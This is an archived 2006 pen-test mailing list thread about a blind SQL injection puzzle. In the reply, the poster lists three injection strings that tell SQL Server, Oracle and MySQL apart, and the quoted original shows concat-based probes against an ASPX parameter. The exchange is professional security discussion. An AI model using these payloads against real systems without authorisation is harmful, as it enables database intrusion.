Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: SQL injection (or not?)

from [Isidro Ramon Labrador Rodriguez] Network Security [Permanent Link]
Subject: RE: SQL injection (or not?)
Date: Wed, 9 Aug 2006 12:01:48 +0200 
When I find a Blind SQL Vulnerability and I want to guess the Databsee
which is behind I try the following injections:


Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a

If it returns a valid value the database is SQL Server


Parameter=[valid value]' and exists(select * from user_tables) and
'a'='a 
 
If it returns a valid value the database is Oracle


Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a

 
If it returns a valid value the database is MySQL


I hope it helps.

Best Regards,
Isidro

-----Mensaje original-----
De: rr@neo.dtcom.lv [mailto:rr@neo.dtcom.lv] 
Enviado el: martes, 08 de agosto de 2006 11:19
Para: pen-test@securityfocus.com
Asunto: SQL injection (or not?)

Hi.

I'm having weird situation with sql injection (I guess). Unfortunately
there is no error message displayed - blind injection, so all that I
know - query is valid or not.

script.aspx?parameter=' and 'a'%2b'a'='aa no result, aparently query is
invalid, so it is not MSSQL, kind of

script.aspx?parameter=' and concat('a','a')='aa returns page, sql query
turns out to be valid, MySQL??

meanwhile
script.aspx?parameter=' and concat('a','a','a')='aaa no result, so it is
not MySQL

also I know that database should be MSSQL

concat is first function I found to work. Maybe it is not sql injection?
What else could it be?

rr


------------------------------------------------------------------------
------
This List Sponsored by: Cenzic

Concerned about Web Application Security? 
Why not go with the #1 solution - Cenzic, the only one to win the
Analyst's Choice Award from eWeek. As attacks through web applications
continue to rise, you need to proactively protect your applications from
hackers. Cenzic has the most comprehensive solutions to meet your
application security penetration testing and vulnerability management
needs. You have an option to go with a managed service (Cenzic
ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download
FREE whitepaper on how a managed service can help you:
http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm
your results from other product. Contact us at request@cenzic.com for
details.
------------------------------------------------------------------------
------


______________________
Este mensaje, y en su caso, cualquier fichero anexo al mismo,
 puede contener informacion clasificada por su emisor como confidencial
 en el marco de su Sistema de Gestion de Seguridad de la 
Informacion siendo para uso exclusivo del destinatario, quedando 
prohibida su divulgacion copia o distribucion a terceros sin la 
autorizacion expresa del remitente. Si Vd. ha recibido este mensaje 
 erroneamente, se ruega lo notifique al remitente y proceda a su borrado. 
Gracias por su colaboracion.
______________________
This message including any attachments may contain confidential 
information, according to our Information Security Management System,
 and intended solely for a specific individual to whom they are addressed.
 Any unauthorised copy, disclosure or distribution of this message
 is strictly forbidden. If you have received this transmission in error,
 please notify the sender immediately and delete it.
______________________

------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? 
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's 
Choice Award from eWeek. As attacks through web applications continue to rise, 
you need to proactively protect your applications from hackers. Cenzic has the 
most comprehensive solutions to meet your application security penetration 
testing and vulnerability management needs. You have an option to go with a 
managed service (Cenzic ClickToSecure) or an enterprise software 
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can 
help you: http://www.cenzic.com/news_events/wpappsec.php 
And, now for a limited time we can do a FREE audit for you to confirm your 
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: What is being a pen tester really like?, Mark Teicher
Next by Date:  RE: Vulnerability Assessment vs. PenTest, Craig Wright
Previous by Thread:  Re: SQL injection (or not?), A. Ramos
Next by Thread:  RE: SQL injection (or not?), Tonnerre Lombard
Indexes:  [Date] [Thread] [Top] [All Lists]